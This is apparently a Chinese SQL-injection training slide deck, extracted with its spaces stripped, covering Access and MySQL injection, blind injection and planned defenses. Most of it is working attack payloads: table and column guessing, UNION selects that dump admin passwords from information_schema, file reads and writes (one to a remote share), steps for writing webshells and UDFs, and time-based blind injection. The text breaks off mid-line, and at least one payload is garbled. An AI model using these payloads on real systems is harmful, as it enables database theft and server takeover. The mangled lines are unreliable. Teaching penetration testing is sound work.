SQL注入实战+进阶0519课件

SQL注入实战+进阶四维创智-Rstar目录Asp+Access注入实战Php+Mysql注入实战SQL盲注技巧SQL注入防御Asp+Access注入实战Access介绍Access特性通过注入获取数据通过注入执行系统命令差异备份获取webshellAcces特性猜测性:在Access中,无法直接获取数据库中的表名和字段名称不支持T-SQL语法不支持多语句查询系统表MsysAccessObjects

MsysACES

MsysObjects

MsysQueries

MsysRelationships通过注入获取数据—实战判断注入页面报错And1=1And1=2特定语句判断’;不正常’;and(selectcount(*)frommsysobjects)>0正常猜表名andexists(select*from表名)猜解列名andexists(select字段from表名)orderbyNN为自然数N大于真实存在的时候页面显示不正常目的：判断表的列数unionselect1,2,3......fromadmin用不同的数字在页面上表示不同的位置数字是代表表名和字段名的显位的位置的猜解列长度(2无法查询的时候)and(selecttop1len(列名)from表名)>N通过注入获取数据—实战ASCII码分析法猜解字段内容ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码and(selecttop1asc(mid(字段,1,1))from数据库名)=ASC码(通过转换工具换)区间判断语句“......between......and......”ANDIIF(ATN(2)>0,1,0)BETWEEN2AND0中文处理法当ASCII转换后为“负数”使用abs()函数取绝对值通过注入获取数据—实战猜解网站目录实质：映射本地驱动器比如：t.asp?id=25and1=2unionselect*fromadminin'.'返回的错误：MicrosoftJETDatabaseEngine错误'80004005'MicrosoftJet数据库引擎打不开文件'c:\windows\system32\inetsrv'。它已经被别的用户以独占方式打开，或没有查看数据的权限。

通过注入获取数据—高级实战写文件如果我们执行这样的语句：

SELECT*into[test.txt]in'd:\web\''text;'fromadminSELECT*into[test.txt]in'\\yourip\share''text;'fromadmin

在d:\web目录下就会生成test.txt文件，其内容就是表admin的内容，这条语句要执行是要有一定的条件的，单句执行没什么问题，但是放到注入点里执行时，等待你的是2种结果：1.动作查询不能作为行为的来源。2.如果在子语句，会提示子语句不支持此查询，也就是说不能在子查询和UNION查询中通过注入获取数据—高级实战unionselectfilelen('c:\boot.ini')frommsysaccessobjectsunionselectgetattr('c:\')frommsysaccessobjects可执行文件将以IIS匿名账户运行如果沙盒模式开启的话，就会返回这样的错误MicrosoftJETDatabaseEngine错误'80040e14'表达式中'filelen'函数未定义通过注入获取数据—高级实战PHP+Mysql注入实战Mysql简介Mysql库结构获取数据库内容读写文件执行命令Mysql简介Oracle收购的MysqlAB公司关系型数据库开源，免费Mysql库结构Information_Schame库存放整个库的结构Mysql库存放用户配置等数据其他库用户自主创建2022/11/29Information_Schame库介绍SCHEMATA表：提供了当前mysql实例中所有数据库的信息。是showdatabases的结果取之此表。TABLES表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。是showtablesfromschemaname的结果取之此表。COLUMNS表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是showcolumnsfromschemaname.tablename的结果取之此表。STATISTICS表：提供了关于表索引的信息。是showindexfromschemaname.tablename的结果取之此表。USER_PRIVILEGES（用户权限）表：给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。SCHEMA_PRIVILEGES（方案权限）表：给出了关于方案（数据库）权限的信息。该信息来自mysql.db授权表。是非标准表。TABLE_PRIVILEGES（表权限）表：给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。COLUMN_PRIVILEGES（列权限）表：给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。CHARACTER_SETS（字符集）表：提供了mysql实例可用字符集的信息。是SHOWCHARACTERSET结果集取之此表。COLLATIONS表：提供了关于各字符集的对照信息。COLLATION_CHARACTER_SET_APPLICABILITY表：指明了可用于校对的字符集。这些列等效于SHOWCOLLATION的前两个显示字段。TABLE_CONSTRAINTS表：描述了存在约束的表。以及表的约束类型。KEY_COLUMN_USAGE表：描述了具有约束的键列。ROUTINES表：提供了关于存储子程序（存储程序和函数）的信息。此时，ROUTINES表不包含自定义函数（UDF）。名为“cname”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的c表列。VIEWS表：给出了关于数据库中的视图的信息。需要有showviews权限，否则无法查看视图信息。TRIGGERS表：提供了关于触发程序的信息。必须有super权限才能查看该表获取所有库名33/sql/show_article.php?id=2and1=2unionselect1,2,GROUP_CONCAT(table_schema),4,5,6,7,8,9,10,11frominformation_schema.TABLES获取所有表名33/sql/show_article.php?id=2and1=2unionselect1,2,GROUP_CONCAT(table_name),4,5,6,7,8,9,10,11frominformation_schema.TABLESWHERETABLE_SCHEMA=database()获取内容33/sql/show_article.php?id=2%20and%201=2%20union%20select%201,GROUP_CONCAT(admin_pass),GROUP_CONCAT(admin_name),4,5,6,7,8,9,10,11%20from%20byart_admin文件操作—Mysql注入实战读取文件Load_file（）写入文件

intooutfileintodumpfile实战Mysql攻击仅有phpmyadmin权限时的利用phpmyadmin的暴力破解/空密码登录获取基本信息（@@basedir）写phpshell写UDF<5.1写入系统目录>5.1写入/plugin/目录存在/config目录的命令执行PHP注入点利用思路Sqli获取密码登录后台->后台上传shellSqli

load_file获取数据库连接密码->intooutfile获取密码尝试登录其他服务SQL注入进阶查找确认注入技巧延时盲注技术绕过过滤二阶SQL注入自动化注入利用—sqlmap利用SQL盲注技术推断攻击技术Substring(),ascii()等结合二分法延时注入技术Mysql:SELECT()unionselectif(SUBSTR(useVERSIONr(),1,4)='root',sleep(5),1)#MSSQL:;ifsyste